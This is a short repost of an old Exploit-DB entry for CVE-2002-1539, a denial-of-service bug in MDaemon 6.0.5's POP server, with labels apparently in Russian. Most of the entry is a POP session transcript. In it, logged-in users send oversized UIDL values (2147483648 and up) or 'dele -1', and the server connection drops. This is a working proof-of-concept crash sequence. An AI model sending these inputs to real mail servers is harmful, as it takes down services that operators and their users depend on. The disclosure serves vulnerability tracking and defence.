- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21965
- Проверка EDB
-
- Пройдено
- Автор
- D4RKGR3Y
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2002-1539
- Дата публикации
- 2002-10-28
Код:
source: https://www.securityfocus.com/bid/6053/info
A buffer overflow vulnerability has been reported for MDaemon. The vulnerability is due to inadequate bounds checking on some POP server commands.
An attacker can exploit this vulnerability by submitting a very large integer value to some commands on the POP server. This will cause the MDaemon service to crash when attempting to process the command.
+OK somedomain.com POP MDaemon 6.0.5 ready
<[email protected]>
USER blah
+OK blah... Recipient ok
PASS 123456
+OK [email protected]'s mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649
Connection to host lost.
---
user dark
+OK dark... Recipient ok
pass ******
+OK dark@dark's mailbox has 13 total messages (2274775 octets).
dele -1
Connection to host lost.- Источник
- www.exploit-db.com
